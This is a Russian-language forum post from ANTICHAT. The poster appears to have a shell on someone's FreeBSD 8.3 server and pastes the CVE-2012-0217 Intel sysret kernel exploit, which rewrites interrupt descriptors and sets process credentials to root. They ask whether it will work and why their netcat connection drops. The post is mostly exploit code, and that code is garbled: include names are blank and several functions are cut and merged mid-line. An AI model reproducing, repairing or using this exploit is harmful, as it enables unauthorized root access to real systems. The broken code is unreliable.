ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Нашёл exploit под freebsd 8.3 .

Инфа в shell такая : FreeBSD ****** 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Mon Jun 30 13:33:36 UTC 2014

Взято с github'a:


.SpoilerTarget" type="button">Spoiler
// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

// Copyright 2012 all right reserved, not for commercial uses, bitches

// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

#include

#include

#include

#include

#include

#include

#include

#include

#define _WANT_UCRED

#include

#include

#include

#include

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()

{

struct region_descriptor idt;

asm ("sidt %0": "=m"(idt));

return (struct gate_descriptor*)idt.rd_base;

}

u_long get_symaddr(char *symname)

{

struct kld_sym_lookup ksym;

ksym.version = sizeof (ksym);

ksym.symname = symname;

if (kldsym(0, KLDSYM_LOOKUP, &ksym) gd_looffset = func;

ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);

ip->gd_ist = ist;

ip->gd_xx = 0;

ip->gd_type = typ;

ip->gd_dpl = dpl;

ip->gd_p = 1;

ip->gd_hioffset = func>>16;

}

void shellcode()

{

// Actually we dont really need to spawn a shell since we

// changed our whole cred struct.

// Just exit...

printf("[*] Got root!\n");

exit(0);

}

void kernelmodepayload()

{

struct thread *td;

struct ucred *cred;

// We need to restore/recover whatever we smashed

// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())

// The #GP exception frame writes 6*64bit registers, i.e. it overwrites

// idt[18], idt[17] and idt[16]

// thus overall we have:

// - idt[18], idt[17] and idt[16] are trashed

// - tf_addr -> overwrites the 64bit-LSB of idt[15]

// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]

// - rdi -> overwrites the 64bit-LSB of idt[7]

// - #PF exception frame overwrites idt[6], idt[5] and idt[4]

struct gate_descriptor *idt = sidt();

setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4

setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5

setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6

setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7

setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14

setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15

setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16

setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17

setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

// get the thread pointer

asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises

cred = td->td_proc->p_ucred;

cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;

cred->cr_groups[0] = 0;

// return to user mode to spawn the shell

asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx

}

#define TRIGGERCODESIZE 20

#define TRAMPOLINECODESIZE 18

void trigger()

{

printf("[*] Setup...\n");

// Allocate one page just before the non-canonical address

printf(" [+] Trigger code...\n");

uint64_t pagesize = getpagesize();

uint8_t * area = (uint8_t*)((1ULL \n");

// Prepare the values we'll need to restore the kernel to a stable state

printf("[*] Resolving kernel addresses...\n");

Xofl_ptr = (uintptr_t)get_symaddr("Xofl");

Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");

Xill_ptr = (uintptr_t)get_symaddr("Xill");

Xdna_ptr = (uintptr_t)get_symaddr("Xdna");

Xpage_ptr = (uintptr_t)get_symaddr("Xpage");

Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");

Xalign_ptr = (uintptr_t)get_symaddr("Xalign");

Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");

Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");

// doeet!

trigger();

return 0;

}


Подойдёт?

И ещё пишу в netcat следующее : nc ip port он 1 сек держится и закрывается,запускал через nc64.exe . В чём проблема?[/I][/I][/I][/I]